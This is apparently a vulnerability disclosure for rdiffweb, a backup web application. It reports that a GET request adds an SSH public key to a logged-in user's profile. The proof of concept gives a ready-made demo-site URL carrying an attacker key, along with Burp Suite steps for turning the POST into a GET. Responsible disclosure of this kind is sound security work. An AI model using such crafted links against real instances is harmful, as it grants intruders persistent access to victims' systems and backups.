Description

While adding SSH public keys to the profile, the server accepts the GET request which results in adding an SSH public key to the profile and leads to unauthorised access to the system and backups.

Proof of Concept

Open the below url after logging in to the demo site.SSH Public key will be added to the profile.

https://rdiffweb-demo.ikus-soft.com/prefs/sshkeys?action=add&title=ssh1&key=ssh-rsa+AAAAB3NzaC1yc2EAAAADAQABAAAAgQCzurRNVKwb0ZJCmUgGenoe4vth5gnHxgnzjHSUO8r7IZiouB6DAciiVUAryV6MQm5trwIXNo0QDwFxyX99exIwUlDu3OzhZHKKbb721hCID17AWZMAQIgxQdu6b27s5YgJXsaxXWvEO2lSRVOnVXoCSI7mK5St%2FCJ8O1OdXivNIQ%3D%3D+noname%0D%0A

OR

1 - On burpsuite, capture the SSH public key adding request and right click and click on change request method , it will change the POST request method to GET after that right click and Copy that URL.

2 - Login to the demo site and open that copied URL. SSH key will add to the account.